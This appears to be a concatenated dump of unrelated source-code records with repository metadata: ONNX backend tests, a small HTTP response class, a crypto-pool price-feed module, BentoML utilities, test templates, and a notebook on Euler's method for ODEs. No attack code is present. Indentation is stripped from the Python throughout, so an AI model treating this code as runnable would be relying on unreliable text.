file.write("\n".join(full_book))
# Parse into chapters
chapter_broken_book = defaultdict(lambda: [])
chap = None
for para in full_book:
possible_chap = is_chapter_head(para)
if possible_chap:
chap = possible_chap
chapter_broken_book[chap].append(para.strip())
else:
chapter_broken_book[chap].append(para)
# Write into Docx
book = Document()
# Start with pre-chapter 1
chapter_paras = chapter_broken_book[None]
book.add_heading(chapter_paras[0], level=1)
for p in chapter_paras[1:]:
para = book.add_paragraph(p.strip())
para.alignment = WD_ALIGN_PARAGRAPH.LEFT
if to_center(p):
para.alignment = WD_ALIGN_PARAGRAPH.CENTER
book.add_page_break()
# Go through chapters in order
chapters = sorted(k for k in chapter_broken_book if k)
for chap in chapters:
chapter_paras = chapter_broken_book[chap]
book.add_heading(chapter_paras[0], level=2)
for p in chapter_paras[1:]:
para = book.add_paragraph(p.strip())
para.alignment = WD_ALIGN_PARAGRAPH.LEFT
if to_center(p):
para.alignment = WD_ALIGN_PARAGRAPH.CENTER
book.add_page_break()
book.save(output_file)
| 22.950413
| 81
| 0.670148
|
4a1460c755dd4caedb2afb52a663c0989ae9050b
| 4,709
|
py
|
Python
|
runtime/bindings/python/tests/test_onnx/utils/onnx_backend.py
|
chccc1994/openvino
|
41f7893ae81d186d15c1754b179bf32a66d03bcf
|
[
"Apache-2.0"
] | 2,406
|
2020-04-22T15:47:54.000Z
|
2022-03-31T10:27:37.000Z
|
runtime/bindings/python/tests/test_onnx/utils/onnx_backend.py
|
thomas-yanxin/openvino
|
031e998a15ec738c64cc2379d7f30fb73087c272
|
[
"Apache-2.0"
] | 4,948
|
2020-04-22T15:12:39.000Z
|
2022-03-31T18:45:42.000Z
|
runtime/bindings/python/tests/test_onnx/utils/onnx_backend.py
|
thomas-yanxin/openvino
|
031e998a15ec738c64cc2379d7f30fb73087c272
|
[
"Apache-2.0"
] | 991
|
2020-04-23T18:21:09.000Z
|
2022-03-31T18:40:57.000Z
|
# Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
"""
ONNX Backend implementation.
See ONNX documentation for details:
https://github.com/onnx/onnx/blob/master/docs/Implementing%20an%20ONNX%20backend.md
"""
from typing import Any, Dict, List, Optional, Sequence, Text, Tuple
import numpy
import onnx
from onnx.backend.base import Backend, BackendRep
from onnx.helper import make_graph, make_model, make_tensor_value_info
from openvino import Function
from tests.runtime import get_runtime
from tests.test_onnx.utils.onnx_helpers import import_onnx_model, np_dtype_to_tensor_type
class OpenVinoOnnxBackendRep(BackendRep):
def __init__(self, ng_model_function, device="CPU"): # type: (List[Function], str) -> None
super().__init__()
self.device = device
self.ng_model_function = ng_model_function
self.runtime = get_runtime()
self.computation = self.runtime.computation(ng_model_function)
def run(self, inputs, **kwargs): # type: (Any, **Any) -> Tuple[Any, ...]
"""Run computation on model."""
return self.computation(*inputs)
class OpenVinoOnnxBackend(Backend):
@classmethod
def is_compatible(
cls,
model, # type: onnx.ModelProto
device="CPU", # type: Text
**kwargs # type: Any
): # type: (...) -> bool
# Return whether the model is compatible with the backend.
try:
import_onnx_model(model)
return True
except Exception:
return False
@classmethod
def prepare(
cls,
onnx_model, # type: onnx.ModelProto
device="CPU", # type: Text
**kwargs # type: Any
): # type: (...) -> OpenVinoOnnxBackendRep
super().prepare(onnx_model, device, **kwargs)
ng_model_function = import_onnx_model(onnx_model)
return OpenVinoOnnxBackendRep(ng_model_function, device)
@classmethod
def run_model(
cls,
model, # type: onnx.ModelProto
inputs, # type: Any
device="CPU", # type: Text
**kwargs # type: Any
): # type: (...) -> Tuple[Any, ...]
return cls.prepare(model, device, **kwargs).run(inputs)
@classmethod
def run_node(
cls,
node, # type: onnx.NodeProto
inputs, # type: Any
device="CPU", # type: Text
outputs_info=None, # type: Optional[Sequence[Tuple[numpy.dtype, Tuple[int, ...]]]]
**kwargs # type: Dict[Text, Any]
): # type: (...) -> Optional[Tuple[Any, ...]]
"""Prepare and run a computation on an ONNX node."""
# default values for input/output tensors
input_tensor_types = [np_dtype_to_tensor_type(node_input.dtype) for node_input in inputs]
output_tensor_types = [onnx.TensorProto.FLOAT for idx in range(len(node.output))]
output_tensor_shapes = [()] # type: List[Tuple[int, ...]]
if outputs_info is not None:
output_tensor_types = [
np_dtype_to_tensor_type(dtype) for (dtype, shape) in outputs_info
]
output_tensor_shapes = [shape for (dtype, shape) in outputs_info]
input_tensors = [
make_tensor_value_info(name, tensor_type, value.shape)
for name, value, tensor_type in zip(node.input, inputs, input_tensor_types)
]
output_tensors = [
make_tensor_value_info(name, tensor_type, shape)
for name, shape, tensor_type in zip(
node.output, output_tensor_shapes, output_tensor_types
)
]
graph = make_graph([node], "compute_graph", input_tensors, output_tensors)
model = make_model(graph, producer_name="OpenVinoOnnxBackend")
if "opset_version" in kwargs:
model.opset_import[0].version = kwargs["opset_version"]
return cls.prepare(model, device).run(inputs)
@classmethod
def supports_device(cls, device): # type: (Text) -> bool
"""Check whether the backend is compiled with particular device support.
In particular it's used in the testing suite.
"""
return device != "CUDA"
class OpenVinoTestBackend(OpenVinoOnnxBackend):
@classmethod
def is_compatible(
cls,
model, # type: onnx.ModelProto
device="CPU", # type: Text
**kwargs # type: Any
): # type: (...) -> bool
# Return whether the model is compatible with the backend.
import_onnx_model(model)
return True
prepare = OpenVinoOnnxBackend.prepare
run_model = OpenVinoOnnxBackend.run_model
run_node = OpenVinoOnnxBackend.run_node
supports_device = OpenVinoOnnxBackend.supports_device
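# Sketch of typical backend usage (hypothetical model path; illustrative only):
#   import onnx
#   model = onnx.load("model.onnx")
#   outputs = OpenVinoOnnxBackend.run_model(model, [input_array], device="CPU")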
| 34.625
| 97
| 0.641113
|
4a1460e96a744b1e6a0ba14abccc4189388f9679
| 1,826
|
py
|
Python
|
uAPI/http_response.py
|
TheGarkine/uAPI
|
eea2695fbf1fccc4b2ceb52c8b1137fe9f526a48
|
[
"MIT"
] | 1
|
2021-11-14T16:22:52.000Z
|
2021-11-14T16:22:52.000Z
|
uAPI/http_response.py
|
TheGarkine/uAPI
|
eea2695fbf1fccc4b2ceb52c8b1137fe9f526a48
|
[
"MIT"
] | null | null | null |
uAPI/http_response.py
|
TheGarkine/uAPI
|
eea2695fbf1fccc4b2ceb52c8b1137fe9f526a48
|
[
"MIT"
] | null | null | null |
import json
from .utils import HTTP_STATUS_CODES
class HTTPResponse:
"""A basic HTTP Response, allows to set custom status_codes and content_types for special requests."""
def __init__(
self,
data: object = None,
status_code: int = 200,
content_type: str = "application/json",
):
"""Constructor for a HTTP Response.
Args:
data (object, optional): The data object, if content_type is application/json, this needs to be parsable. If not it needs a string representation. Defaults to None.
status_code (int, optional): The status code to be sent to the user. Defaults to 200.
content_type (str, optional): The content type to be sent to the user. Defaults to "application/json".
Raises:
Exception: If the status_code is unknown.
"""
if status_code not in HTTP_STATUS_CODES:
raise Exception("status_code {} not known!".format(status_code))
self.data = data
self.status_code = status_code
self.content_type = content_type
def to_HTTP(self) -> str:
"""Generates a HTTP compatible string to be sent to the client.
Returns:
str: The HTTP string.
"""
if self.data:
            if self.content_type == "application/json":
data = json.dumps(self.data)
else:
data = str(self.data)
else:
data = ""
http = "HTTP/1.1 {} {}\r\n".format(
self.status_code, HTTP_STATUS_CODES[self.status_code]
)
http += "Content-Type: {}\r\n".format(self.content_type)
if data:
http += "Content-Length: {}\r\n".format(len(data))
http += "Connection: close\r\n\r\n"
http += data
return http
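# Illustrative usage (assumes HTTP_STATUS_CODES maps 200 to "OK"):
#   resp = HTTPResponse(data={"ok": True})
#   resp.to_HTTP()
#   # 'HTTP/1.1 200 OK\r\nContent-Type: application/json\r\n'
#   # 'Content-Length: 12\r\nConnection: close\r\n\r\n{"ok": true}'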
| 32.607143
| 176
| 0.589814
|
4a14611e72efda1bf3552637bc751b682b6d116e
| 8,103
|
py
|
Python
|
python/utils.py
|
verc/trustless-liquidity-pool
|
d54a77b3629a27e4e8a414c6b04c05245f407880
|
[
"MIT"
] | 1
|
2021-01-04T14:38:18.000Z
|
2021-01-04T14:38:18.000Z
|
python/utils.py
|
verc/nu-pool
|
d54a77b3629a27e4e8a414c6b04c05245f407880
|
[
"MIT"
] | null | null | null |
python/utils.py
|
verc/nu-pool
|
d54a77b3629a27e4e8a414c6b04c05245f407880
|
[
"MIT"
] | 3
|
2018-09-23T15:33:04.000Z
|
2021-06-20T14:34:56.000Z
|
#! /usr/bin/env python
"""
The MIT License (MIT)
Copyright (c) 2015 creon (creon.nu@gmail.com)
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
OR OTHER DEALINGS IN THE SOFTWARE.
"""
import threading
import urllib2
import urllib
import json
import logging
import httplib
import thread
import socket
import time
nulllogger = logging.getLogger('null')
nulllogger.addHandler(logging.NullHandler())
nulllogger.propagate = False
class Connection():
def __init__(self, server, logger = None):
self.server = server
self.logger = logger
if not logger:
self.logger = logging.getLogger('null')
def json_request(self, request, method, params, headers, trials = None, timeout = 5):
while True:
curtime = time.time()
connection = httplib.HTTPConnection(self.server, timeout = timeout)
try:
connection.request(request, method, urllib.urlencode(params), headers = headers)
response = connection.getresponse()
content = response.read()
return json.loads(content)
except httplib.BadStatusLine:
msg = 'server could not be reached'
except ValueError:
msg = 'server response invalid'
            except socket.error as v:
msg = 'socket error (%s)' % str(v[0])
if str(v[0]) == 'timed out':
timeout = min(timeout + 5, 30)
except:
msg = 'unknown connection error'
if trials:
if trials <= 1:
self.logger.debug("%s: %s", method, msg)
return { 'message' : msg, 'code' : -1, 'error' : True }
trials = trials - 1
self.logger.debug("%s: %s, retrying in 5 seconds with timeout %d...", method, msg, timeout)
time.sleep(max(5.0 - time.time() + curtime, 0))
def get(self, method, params = None, trials = None, timeout = 5):
if not params: params = {}
return self.json_request('GET', '/' + method, params, {}, trials, timeout)
def post(self, method, params = None, trials = None, timeout = 5):
if not params: params = {}
headers = { "Content-type": "application/x-www-form-urlencoded" }
return self.json_request('POST', '/' + method, params, headers, trials, timeout)
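# Illustrative use (hypothetical pool host):
#   conn = Connection('pool.example.com:3333', logger)
#   status = conn.get('status', trials=3)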
class ConnectionThread(threading.Thread):
def __init__(self, conn, logger = None):
threading.Thread.__init__(self)
self.daemon = True
self.active = True
self.pause = False
        self.logger = logger if logger else logging.getLogger('null')
self.conn = conn
def stop(self):
self.active = False
def acquire_lock(self): pass
def release_lock(self): pass
class CheckpointThread(ConnectionThread):
def __init__(self, host, logger = None):
super(CheckpointThread, self).__init__(Connection(host, logger), logger)
self.users = []
self.lock = threading.Lock()
self.trigger = threading.Lock()
self.trigger.acquire()
self.checkpoint = { 'error' : 'no checkpoint received' }
self.start()
    def collect(self, timeout):
        # Wake the polling loop in run(); finish() then blocks on self.lock
        # until run() has fetched a checkpoint (or the timeout expires).
        self.timeout = timeout
        try: self.trigger.release()
        except thread.error: pass
def finish(self):
try:
self.lock.acquire()
self.lock.release()
except KeyboardInterrupt:
raise
return self.checkpoint
def register(self, address, key, name):
self.users.append(key)
self.conn.post('register', { 'address' : address, 'key' : key, 'name' : name }, trials = 3, timeout = 10)
def run(self):
while self.active:
self.trigger.acquire()
self.lock.acquire()
starttime = time.time()
            # Chained comparison: keep polling while now < deadline and deadline > 0.
            while time.time() < starttime + self.timeout > 0:
self.checkpoint = self.conn.post('checkpoints', { u : 1 for u in self.users }, trials = 1, timeout = 1)
if 'error' in self.checkpoint:
time.sleep(0.1)
self.logger.error('unable to retrieve checkpoint from %s: %s', self.conn.server, self.checkpoint['error'])
else:
break
self.lock.release()
class PriceFeed():
def __init__(self, update_interval, logger):
self.update_interval = update_interval
self.feed = { x : [0, threading.Lock(), 0.0] for x in [ 'btc', 'eur', 'cny' ] }
self.logger = logger if logger else logging.getLogger('null')
def price(self, unit, force = False):
if unit == 'usd' or unit == 'nbt': return 1.0 #AlwaysADollar
if not unit in self.feed: return None
self.feed[unit][1].acquire()
curtime = time.time()
if force or curtime - self.feed[unit][0] > self.update_interval:
self.feed[unit][0] = curtime
#self.feed[unit][2] = None
if unit == 'btc':
try: # bitfinex
ret = json.loads(urllib2.urlopen(urllib2.Request('https://api.bitfinex.com/v1//pubticker/btcusd'), timeout = 3).read())
self.feed['btc'][2] = 1.0 / float(ret['mid'])
except:
self.logger.warning("unable to update BTC price from bitfinex")
try: # coinbase
ret = json.loads(urllib2.urlopen(urllib2.Request('https://coinbase.com/api/v1/prices/spot_rate?currency=USD'), timeout = 3).read())
self.feed['btc'][2] = 1.0 / float(ret['amount'])
except:
self.logger.warning("unable to update BTC price from coinbase")
try: # bitstamp
ret = json.loads(urllib2.urlopen(urllib2.Request('https://www.bitstamp.net/api/ticker/'), timeout = 3).read())
self.feed['btc'][2] = 2.0 / (float(ret['ask']) + float(ret['bid']))
except:
self.logger.error("unable to update price for BTC")
elif unit == 'eur':
try: # yahoo
ret = json.loads(urllib2.urlopen(urllib2.Request('http://finance.yahoo.com/webservice/v1/symbols/allcurrencies/quote?format=json'), timeout = 3).read())
for res in ret['list']['resources']:
if res['resource']['fields']['name'] == 'USD/EUR':
self.feed['eur'][2] = float(res['resource']['fields']['price'])
except:
self.logger.warning("unable to update EUR price from yahoo")
try: # bitstamp
ret = json.loads(urllib2.urlopen(urllib2.Request('https://www.bitstamp.net/api/eur_usd/'), timeout = 3).read())
self.feed['eur'][2] = 2.0 / (float(ret['sell']) + float(ret['buy']))
except:
self.logger.error("unable to update price for EUR")
elif unit == 'cny':
try: # yahoo
ret = json.loads(urllib2.urlopen(urllib2.Request('http://finance.yahoo.com/webservice/v1/symbols/allcurrencies/quote?format=json'), timeout = 3).read())
for res in ret['list']['resources']:
if res['resource']['fields']['name'] == 'USD/CNY':
self.feed['cny'][2] = float(res['resource']['fields']['price'])
except:
self.logger.warning("unable to update CNY price from yahoo")
try: # coindesk
ret = json.loads(urllib2.urlopen(urllib2.Request('https://api.coindesk.com/v1/bpi/currentprice/CNY.json'), timeout = 3).read())
self.feed['cny'][2] = ret['bpi']['CNY']['rate'] / ret['bpi']['USD']['rate']
except:
self.logger.error("unable to update price for CNY")
self.feed[unit][1].release()
return self.feed[unit][2]
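# Illustrative use (a sketch; the feed stores units-per-USD, so invert for USD prices):
#   feed = PriceFeed(30, logger)
#   usd_per_btc = 1.0 / feed.price('btc')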
| 40.515
| 162
| 0.640257
|
4a1461568dce72047bfc5633431f67883116fc32
| 1,372
|
py
|
Python
|
tests/test_vlan/test_network.py
|
mteter-upenn/bacpypes
|
88623988103a48a3f5c8dfd0eb0ca7ffa0bd82b6
|
[
"MIT"
] | null | null | null |
tests/test_vlan/test_network.py
|
mteter-upenn/bacpypes
|
88623988103a48a3f5c8dfd0eb0ca7ffa0bd82b6
|
[
"MIT"
] | null | null | null |
tests/test_vlan/test_network.py
|
mteter-upenn/bacpypes
|
88623988103a48a3f5c8dfd0eb0ca7ffa0bd82b6
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Test Module Template
--------------------
"""
import unittest
from bacpypes.debugging import bacpypes_debugging, ModuleLogger
# some debugging
_debug = 0
_log = ModuleLogger(globals())
@bacpypes_debugging
def setup_module():
if _debug: setup_module._debug("setup_module")
@bacpypes_debugging
def teardown_module():
if _debug: teardown_module._debug("teardown_module")
@bacpypes_debugging
def setup_function(function):
if _debug: setup_function._debug("setup_function %r", function)
@bacpypes_debugging
def teardown_function(function):
if _debug: teardown_function._debug("teardown_function %r", function)
@bacpypes_debugging
class TestCaseTemplate(unittest.TestCase):
@classmethod
def setup_class(cls):
if _debug: TestCaseTemplate._debug("setup_class")
@classmethod
def teardown_class(cls):
if _debug: TestCaseTemplate._debug("teardown_class")
def setup_method(self, method):
if _debug: TestCaseTemplate._debug("setup_module %r", method)
def teardown_method(self, method):
if _debug: TestCaseTemplate._debug("teardown_method %r", method)
def test_something(self):
if _debug: TestCaseTemplate._debug("test_something")
def test_something_else(self):
if _debug: TestCaseTemplate._debug("test_something_else")
| 22.866667
| 73
| 0.727405
|
4a1461f7747adae3ff11bf3c5ba1a59e236fb320
| 2,480
|
py
|
Python
|
tests/facebook/apis/test_pictures.py
|
Socian-Ltd/python-facebook-1
|
e9a4f626b37541103c9534a29342ef6033c09c06
|
[
"Apache-2.0"
] | null | null | null |
tests/facebook/apis/test_pictures.py
|
Socian-Ltd/python-facebook-1
|
e9a4f626b37541103c9534a29342ef6033c09c06
|
[
"Apache-2.0"
] | null | null | null |
tests/facebook/apis/test_pictures.py
|
Socian-Ltd/python-facebook-1
|
e9a4f626b37541103c9534a29342ef6033c09c06
|
[
"Apache-2.0"
] | 1
|
2021-06-02T07:15:35.000Z
|
2021-06-02T07:15:35.000Z
|
import json
import unittest
import responses
from six import iteritems
import pyfacebook
class PictureTestApi(unittest.TestCase):
BASE_PATH = "testdata/facebook/apidata/pictures/"
BASE_URL = "https://graph.facebook.com/{}/".format(pyfacebook.Api.VALID_API_VERSIONS[-1])
with open(BASE_PATH + "single_picture.json", "rb") as f:
SINGLE_PICTURE = json.loads(f.read().decode("utf-8"))
with open(BASE_PATH + "multi_pictures.json", "rb") as f:
MULTI_PICTURE = json.loads(f.read().decode("utf-8"))
def setUp(self):
self.api = pyfacebook.Api(
app_id="123456", app_secret="secret",
long_term_token="token"
)
def testGetPictureInfo(self):
page_id = "2121008874780932"
with self.assertRaises(pyfacebook.PyFacebookException):
self.api.get_picture(page_id=page_id, pic_type="not")
with responses.RequestsMock() as m:
m.add("GET", self.BASE_URL + page_id + "/picture", json=self.SINGLE_PICTURE)
picture = self.api.get_picture(
page_id=page_id,
)
self.assertEqual(picture.height, 200)
with responses.RequestsMock() as m:
m.add("GET", self.BASE_URL + page_id + "/picture", json=self.SINGLE_PICTURE)
picture = self.api.get_picture(
page_id=page_id, pic_type="large",
return_json=True
)
self.assertEqual(picture["height"], 200)
def testGetPictures(self):
ids = ["2121008874780932", "20531316728"]
with self.assertRaises(pyfacebook.PyFacebookException):
self.api.get_pictures(ids=ids, pic_type="not")
with responses.RequestsMock() as m:
m.add("GET", self.BASE_URL + "picture", json=self.MULTI_PICTURE)
picture_dict = self.api.get_pictures(
ids=ids
)
for _id, data in iteritems(picture_dict):
self.assertIn(_id, ids)
self.assertEqual(200, data.height)
with responses.RequestsMock() as m:
m.add("GET", self.BASE_URL + "picture", json=self.MULTI_PICTURE)
picture_dict = self.api.get_pictures(
ids=ids,
pic_type="large",
return_json=True
)
for _id, data in iteritems(picture_dict):
self.assertIn(_id, ids)
self.assertEqual(200, data["height"])
| 32.631579
| 93
| 0.594758
|
4a146224eeea7f942aec628db5d234c5140d609a
| 6,461
|
py
|
Python
|
bentoml/_internal/utils/__init__.py
|
SAB-6/BentoML
|
d16d3dc75d75a8da300b47a15493ca53f51baabd
|
[
"Apache-2.0"
] | 1
|
2022-02-13T05:35:47.000Z
|
2022-02-13T05:35:47.000Z
|
bentoml/_internal/utils/__init__.py
|
khuyentran1401/BentoML
|
06973901fd04d115eab862956ba26732644dcd52
|
[
"Apache-2.0"
] | null | null | null |
bentoml/_internal/utils/__init__.py
|
khuyentran1401/BentoML
|
06973901fd04d115eab862956ba26732644dcd52
|
[
"Apache-2.0"
] | null | null | null |
import os
import uuid
import socket
import typing as t
import functools
import contextlib
from typing import TYPE_CHECKING
from pathlib import Path
import fs
import fs.copy
from ..types import PathType
from .lazy_loader import LazyLoader
if TYPE_CHECKING:
from fs import FS
C = t.TypeVar("C")
T = t.TypeVar("T")
_T_co = t.TypeVar("_T_co", covariant=True, bound=t.Any)
__all__ = [
"cached_property",
"cached_contextmanager",
"reserve_free_port",
"get_free_port",
"catch_exceptions",
"LazyLoader",
"validate_or_create_dir",
]
def randomize_runner_name(module_name: str):
return f"{module_name.split('.')[-1]}_{uuid.uuid4().hex[:6].lower()}"
def validate_or_create_dir(*path: PathType) -> None:
for p in path:
path_obj = Path(p)
if path_obj.exists():
if not path_obj.is_dir():
raise OSError(20, f"{path_obj} is not a directory")
else:
path_obj.mkdir(parents=True)
def calc_dir_size(path: PathType) -> int:
return sum(f.stat().st_size for f in Path(path).glob("**/*") if f.is_file())
def human_readable_size(size: int, decimal_places: int = 2) -> str:
for unit in ["B", "KiB", "MiB", "GiB", "TiB", "PiB"]:
if size < 1024.0 or unit == "PiB":
break
size /= 1024.0
return f"{size:.{decimal_places}f} {unit}"
class catch_exceptions(t.Generic[_T_co], object):
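    """Decorator: call the wrapped function, catch ``catch_exc``, and re-raise it
    as ``throw_exc(msg)``; when ``raises`` is False, return ``fallback`` instead.
    Usage sketch (illustrative names, not part of this module)::
        @catch_exceptions(KeyError, throw_exc=ValueError, msg="missing key")
        def lookup(d: t.Dict[str, str]) -> str:
            return d["key"]
    """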
def __init__(
self,
catch_exc: t.Union[t.Type[BaseException], t.Tuple[t.Type[BaseException], ...]],
throw_exc: t.Callable[[str], BaseException],
msg: str = "",
fallback: t.Optional[_T_co] = None,
raises: t.Optional[bool] = True,
) -> None:
self._catch_exc = catch_exc
self._throw_exc = throw_exc
self._msg = msg
self._fallback = fallback
self._raises = raises
# TODO: use ParamSpec (3.10+): https://github.com/python/mypy/issues/8645
def __call__( # noqa: F811
self, func: t.Callable[..., _T_co]
) -> t.Callable[..., t.Optional[_T_co]]:
@functools.wraps(func)
def _(*args: t.Any, **kwargs: t.Any) -> t.Optional[_T_co]:
try:
return func(*args, **kwargs)
except self._catch_exc:
if self._raises:
raise self._throw_exc(self._msg)
return self._fallback
return _
@contextlib.contextmanager
def reserve_free_port(host: str = "localhost") -> t.Iterator[int]:
"""
detect free port and reserve until exit the context
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((host, 0))
port = sock.getsockname()[1]
yield port
sock.close()
def copy_file_to_fs_folder(
src_path: str,
dst_fs: "FS",
dst_folder_path: str = ".",
dst_filename: t.Optional[str] = None,
):
"""Copy the given file at src_path to dst_fs filesystem, under its dst_folder_path
folder with dst_filename as file name. When dst_filename is None, keep the original
file name.
"""
src_path = os.path.realpath(os.path.expanduser(src_path))
dir_name, file_name = os.path.split(src_path)
src_fs = fs.open_fs(dir_name)
dst_filename = file_name if dst_filename is None else dst_filename
dst_path = fs.path.join(dst_folder_path, dst_filename)
fs.copy.copy_file(src_fs, file_name, dst_fs, dst_path)
def resolve_user_filepath(filepath: str, ctx: t.Optional[str]) -> str:
"""Resolve the abspath of a filepath provided by user, which may contain "~" or may
be a relative path base on ctx dir.
"""
# Return if filepath exist after expanduser
_path = os.path.expanduser(filepath)
if os.path.exists(_path):
return os.path.realpath(_path)
# Try finding file in ctx if provided
if ctx:
_path = os.path.expanduser(os.path.join(ctx, filepath))
if os.path.exists(_path):
return os.path.realpath(_path)
raise FileNotFoundError(f"file {filepath} not found")
class cached_property(t.Generic[C, T]):
"""A property that is only computed once per instance and then replaces
itself with an ordinary attribute. Deleting the attribute resets the
property.
"""
def __init__(self, func: t.Callable[[C], T]):
try:
functools.update_wrapper(self, func)
except AttributeError:
pass
self.func = func
# pylint: disable=attribute-defined-outside-init
def __set_name__(self, owner, name):
self.name = name
def __get__(self, obj: C, cls: t.Type[C]) -> T:
if obj is None:
raise AttributeError(f"'{cls}' has no member '{self.name}'")
value = obj.__dict__[self.name] = self.func(obj)
return value
VT = t.TypeVar("VT")
class cached_contextmanager:
"""
Just like contextlib.contextmanager, but will cache the yield value for the same
arguments. When one instance of the contextmanager exits, the cache value will
    also be popped.
Example Usage:
(To reuse the container based on the same image)
>>> @cached_contextmanager("{docker_image.id}")
>>> def start_docker_container_from_image(docker_image, timeout=60):
>>> container = ...
>>> yield container
>>> container.stop()
"""
def __init__(self, cache_key_template: t.Optional[str] = None):
self._cache_key_template = cache_key_template
self._cache: t.Dict[t.Any, t.Any] = {}
def __call__(
self,
func: t.Callable[..., t.Generator[VT, None, None]],
) -> t.Callable[..., t.ContextManager[VT]]:
func_m = contextlib.contextmanager(func)
@contextlib.contextmanager
@functools.wraps(func)
def _func(*args: t.Any, **kwargs: t.Any) -> t.Any:
import inspect
bound_args = inspect.signature(func).bind(*args, **kwargs)
bound_args.apply_defaults()
if self._cache_key_template:
cache_key = self._cache_key_template.format(**bound_args.arguments)
else:
cache_key = repr(tuple(bound_args.arguments.values()))
if cache_key in self._cache:
yield self._cache[cache_key]
else:
with func_m(*args, **kwargs) as value:
self._cache[cache_key] = value
yield value
self._cache.pop(cache_key)
return _func
| 30.191589
| 87
| 0.624207
|
4a1462c71ab690ff4a41846d739b53cb53fe3932
| 18,883
|
py
|
Python
|
_build/jupyter_execute/courseware/Chapter_6/ODEs.py
|
saturnaxis/PHYS3820_Book
|
e6ead8c5353c7cfacba58376d259f6c3a11b0b3a
|
[
"MIT"
] | null | null | null |
_build/jupyter_execute/courseware/Chapter_6/ODEs.py
|
saturnaxis/PHYS3820_Book
|
e6ead8c5353c7cfacba58376d259f6c3a11b0b3a
|
[
"MIT"
] | null | null | null |
_build/jupyter_execute/courseware/Chapter_6/ODEs.py
|
saturnaxis/PHYS3820_Book
|
e6ead8c5353c7cfacba58376d259f6c3a11b0b3a
|
[
"MIT"
] | 1
|
2022-01-17T23:19:38.000Z
|
2022-01-17T23:19:38.000Z
|
#!/usr/bin/env python
# coding: utf-8
# # Ordinary Differential Equations (ODEs)
# If you launch an object (e.g., a large wooden rabbit) over a castle wall with some initial velocity $v$, then you will note that the vertical component of its velocity gradually decreases. Eventually, the vertical velocity component changes direction and the object (or wooden rabbit) impacts the ground with a speed roughly equal to the speed it had when it left.
#
# This example probably reminds you of the kinematics that you learned in your introductory physics course. Resurrecting that prior knowledge will help you develop the intuition needed to set up and solve ordinary differential equations (ODEs) numerically. Through kinematics, we define an acceleration $a$ as:
#
# $a = \frac{dv}{dt}$ or $dv = a dt$ (with finite steps $d \rightarrow \Delta$).
#
# However, we can perform a [Galilean transformation](https://en.wikipedia.org/wiki/Galilean_transformation) to make this result more general, which incorporates the initial velocity $v_o$ and then we can estimate the new velocity (given that we can calculate $a$). Mathematically, this is:
#
# $v = v_o + a\Delta t$.
#
# Eventually, we'll want to change this into code. This is much easier if we write the above equation as a [recurrence relation](https://en.wikipedia.org/wiki/Recurrence_relation), where the next value can be determined by the previous one:
#
# $v_{i+1} = v_i + \frac{dv}{dt}\Delta t$.
#
# We can use an identical process to estimate the position of the projectile along a direction $x$ and using the definition $v = dx/dt$:
#
# $x_{i+1} = x_i + \frac{dx}{dt}\Delta t$.
#
# This method does not give an exact result with large $\Delta t$, but for small enough $\Delta t$ it's close. We can generalize further to define a state **$y$**$=[x,v]$ and use a single relation as:
#
# $y_{i+1} = [x_i,v_i] + \frac{d}{dt}[x_i,v_i]\Delta t$.
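# As a quick sketch (with illustrative numbers), one such vector update looks like this in code:
# In[ ]:
import numpy as np
y = np.array([0., 10.]) #state [x, v]: position 0 m, velocity 10 m/s
dt, a = 0.1, -9.8 #time step (s) and constant acceleration (m/s^2)
y = y + np.array([y[1], a])*dt #y_{i+1} = y_i + (dy/dt) dt
print(y) #approximately [1. 9.02]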
# ## Euler's method
# The method we've described is called *Euler's method* and it is a good first step in solving ODEs. Let's consider a picture of how it works. Starting from an initial point $(t_o,x_o)$, we estimate the slope of $x(t)$ between the current point and a time step $\Delta t$ forward to find the approximate value of $x_1$. Because we used a recurrence relation, these steps can be repeated to find each value $x_i$ in the series $x_n$.
#
# The error through Euler's method can be large, but you can reduce the error introduced in the approximation by decreasing the time step $\Delta t$. Essentially, you are decreasing the interval for the function $x(t)$ until it becomes approximately linear. To determine the sensitivity of Euler's method relative to the step size $\Delta t$, we perform a Taylor expansion of $x(t)$ as:
#
# $x(t+\Delta t) = x(t) + \frac{dx}{dt}\Delta t + \frac{d^2x}{dt^2}\frac{\Delta t^2}{2} + \cdots$.
#
# The first two terms on the right hand side are Euler's method, and the error in each step is on the order of $\Delta t^2$, since that's the first term omitted in the Taylor series expansion. However, you accumulate error over the full time interval $\tau$ with the number of steps $N = \tau/\Delta t$, which changes the total error to order $\Delta t$. Notice that decreasing the step size $\Delta t$ improves your result only linearly, and that Euler's method works only on first-order differential equations. This means that if we can re-cast higher order differential equations into a series of first-order differential equations, then we have a very general method.
#
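# A quick numerical check of this scaling (a sketch using $dy/dt = -y$, whose exact solution at $t = 1$ is $e^{-1}$): increasing the number of steps $N$ tenfold shrinks the accumulated Euler error by roughly the same factor.
# In[ ]:
import numpy as np
for N in (10, 100, 1000):
    dt, y = 1.0/N, 1.0 #step size and initial condition y(0) = 1
    for _ in range(N):
        y += -y*dt #one Euler step of dy/dt = -y
    print(N, abs(y - np.exp(-1))) #global error is ~O(dt)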
# For example, let's explore the case of a mass on a spring. The force of a spring is $F_{spr} = ma = -kx$, where $k$ is a spring constant and $m$ is the mass. This is a second-order ODE, but we can re-write the equations like in the introductory section with the Galilean transformation. This involves a new variable $v = dx/dt$. We have the following:
#
# $a = -\frac{k}{m}x$ (original),
#
# which can be transformed as two coupled first-order differential equations
#
# $\frac{dx}{dt} = v$
#
# and
#
# $\frac{dv}{dt} = -\frac{k}{m}x$.
